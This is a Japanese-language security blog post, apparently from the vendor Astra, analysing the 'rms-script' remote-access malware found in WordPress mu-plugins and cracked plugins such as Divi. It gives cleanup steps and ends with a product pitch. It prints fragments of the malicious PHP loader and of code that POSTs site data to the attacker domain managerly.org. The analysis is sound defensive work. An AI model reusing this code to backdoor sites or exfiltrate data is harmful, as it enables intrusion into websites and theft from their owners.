[修正] WordPress rms-script リモート アクセス マルウェア

最近、一部の WordPress Web サイトに、外部サイトへのリモート アクセスを許可するリモート アクセス マルウェアが含まれていることが判明しました。このマルウェアの場所は、wp-content/mu-plugins フォルダー内のランダムな PHP ファイルであることが後で判明しました。一般的な無料の WordPress セキュリティ プラグインを使用して Web サイトをスキャンしても、異常は検出されませんでした。このマルウェアの詳細と修正方法については、以下をお読みください。

rms-script マルウェアの機能

最初は、WordPress サイトに奇妙なエラーが表示されているようです。このエラーはリモート アクセス マルウェアによって引き起こされており、wp-content/mu-plugins フォルダー、具体的には下の図で強調表示されている疑わしい PHP ファイルにまでたどることができます:

サイトでマルウェア スキャンが実行された後でも、リモート アクセス マルウェアの兆候はありませんでした。しかし、PHP ファイルをさらに調べたところ、コードが外部サイト managerly.org へのリモート ログイン アクセスを許可していることが判明しました。

ここで見つかった完全な悪意のある rms-script PHP コードを確認できます。

マルウェアをさらに掘り下げる

疑わしい PHP ファイル (rms-script-mu-plugin.php および rms-script-ini.php) への参照についてサイトのプラグインを参照すると、クラックされたプラグインにこのマルウェアが含まれている可能性があることがわかりました。これらのファイルの痕跡は、Divi Theme フォルダーにも見つかりました。サンプル サイトには、無効化されたバージョンがありました。フォルダーが削除されると、スクリプトは実行を停止しました。

以下は、2 つの悪意のある PHP スクリプトを必要とするクラックされたプラグインで見つかったコードの一部です:

require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);

以下は、前のものに続くコード スニペットです:

$GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';

$args=
[
 'method' => 'POST',
 'timeout' => 15,
 'redirection' => 15,
 'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
 'body' => $body
];
// Send to RMS
$curl = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

このコードは、それが存在する Web サイトからデータを収集し、それを外部サイトに送信しているようです。つまり、これは、データをサイト managerly.org に送信するリモート アクセス マルウェアです。これは非常に有害な場合があります。詳細については、次のセクションで説明します。

managerly.org をさらに分析すると、次の情報が明らかになります:

• 登録組織: 無錫伊聯合同会社
• 登録者の都道府県: 福建省
• 登録国: CN
• ネームサーバー: LARS.NS.CLOUDFLARE.COM、ASHLEY.NS.CLOUDFLARE.COM
• DNSSEC: 署名なし

登録団体の名前を検索すると、Reddit の投稿でも多くのヒットが返されます。この LLC は偽物であり、他の詐欺にも関与しているようです。以下にいくつかの検索結果を示します:

このマルウェアが危険な理由

リモート アクセス マルウェア攻撃では、攻撃者が Web サイトにアクセスして悪意のあるキャンペーンに使用する可能性があります。サイトを制御できなくなり、機密データが攻撃者に公開される可能性があります。

ここでは、攻撃者が rms-script リモート アクセス マルウェアを介して WordPress アカウントをマイニングしようとしています。このハッキングは、パスワードを変更したとしても、Web サイトのセキュリティを回避できる可能性があります。

無料のセキュリティ ツールではこのマルウェアを検出できないため、この問題が再発する可能性が高いことに注意してください。そのため、疑わしいファイルがないかウェブサイトを徹底的にチェックし、可能であればウェブサイトのセキュリティを強化してください。

wp-contents/mu-plugins フォルダーと Divi Theme フォルダー (インストールされている場合) に悪意のある PHP ファイルがないかどうかも確認してください。

WordPress サイトを修正する方法

1.クリーニングの前にサイトのバックアップをとってください:

クリーニング中にユーザーが感染したページにアクセスしないように、Web サイトをオフラインにすることをお勧めします。すべてのコア ファイルとデータベースのバックアップを作成してください。 .zip などの圧縮ファイル形式でバックアップを作成してください。

2.サイトから無効化またはクラックされたプラグインを削除します:

多くのプラグインやテーマ (特に Divi テーマ) には、このリモート アクセス マルウェアが含まれているようです。 The WordPress Club のクラックされたプラグインやテーマで見つかったこのマルウェアの詳細は、このスタック オーバーフローの回答で確認できます。そのため、ヌル化されたプラグインやクラックされたプラグインをサイトから削除してから、マルウェア スキャンを実行してください。正規のプラグインとテーマのみを使用し、更新を続けて、サイトが脆弱でないことを確認してください。

3.疑わしいフォルダとファイルをすべて削除します:

サイト内で悪意のある可能性のあるファイルを確認し、それらを削除してください。

関連ガイド – WordPress マルウェアの除去

4.マルウェア スキャンを実行します:

マルウェアは絶えず進化していますが、マルウェア スキャナーも進化しています。 Web サーバーでマルウェア スキャンを実行して、マルウェアや悪意のあるファイルを検出することを常にお勧めします。 Web ホストが提供する cPanel の「ウイルス スキャナー」ツールを使用するか、Astra Pro Plan で専門的なマルウェア クリーンアップを取得できます。当社のマルウェア スキャナーは、悪意のある PHP ファイルにフラグを立てます!

WordPress wp-content/mu-plugin リモート アクセス マルウェア:まとめ

最近、WordPress サイトでリモート アクセス マルウェアが発見されました。そのほとんどは、無効化されたプラグインまたはクラックされたプラグインを使用しているサイトです。このマルウェアは、多くの一般的なマルウェア スキャナーによって検出されませんでしたが、常に更新されているため、サイトが影響を受ける可能性がある場合はスキャンを実行することをお勧めします.さらに、本物のプラグインとテーマのみを使用し、それらを最新の状態に保つことは、サイトを安全に保つための優れた方法です.

アストラについて

Astra は、ハッカー、インターネットの脅威、ボットと戦う必須の Web セキュリティ スイートです。 WordPress、OpenCart、Magento などの一般的な CMS を実行している Web サイトにプロアクティブなセキュリティを提供します。テクニカル サポート チームは年中無休 24 時間対応で、ハッキングやマルウェア感染の状況に関するすべての質問に対応します。